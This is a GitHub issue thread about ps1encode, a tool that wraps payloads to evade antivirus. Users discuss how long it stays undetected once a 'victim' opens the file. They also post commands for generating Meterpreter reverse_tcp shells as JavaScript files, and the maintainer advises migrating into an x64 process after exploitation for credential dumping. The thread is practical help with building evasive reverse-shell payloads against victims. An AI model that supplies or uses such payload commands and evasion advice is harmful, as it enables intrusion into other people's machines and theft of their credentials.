Good but Gets detected....

Open complexpotato opened this issue 7 years ago • 3 comments

This really should not be an issue but I am just posting this to let other people know... ps1encode is really good, it does not get caught until the victim opens the file, but it gets caught because the antivirus saw it doing an Evo-Gen activity.

complexpotato avatar Jan 02 '18 18:01 complexpotato

--PAYLOAD windows/x64/meterpreter/reverse_tcp --ENCODE cmd -t js > x64shell.js
Error: The selected arch is incompatible with the payload
why?

BeingEasy avatar Jul 07 '19 10:07 BeingEasy

Hey @BeingEasy, when selecting your encoder, the --ENCODE switch is the same as -t. The tool as of now does not support native x64 shells, but generating a standard x86 payload will work on 64-bit systems. If you need a native-architecture meterpreter for credential dumping purposes, I suggest using the "migrate" command to hook into an x64 process post-exploit.

Try this: --PAYLOAD windows/meterpreter/reverse_tcp --ENCODE js > x86-64shell.js

addenial avatar Jul 08 '19 18:07 addenial

@BeingEasy added x64 support https://github.com/addenial/ps1encode/commit/a52cb04a4720147f82d5615745b19f2eb1660855

addenial avatar Jul 17 '19 23:07 addenial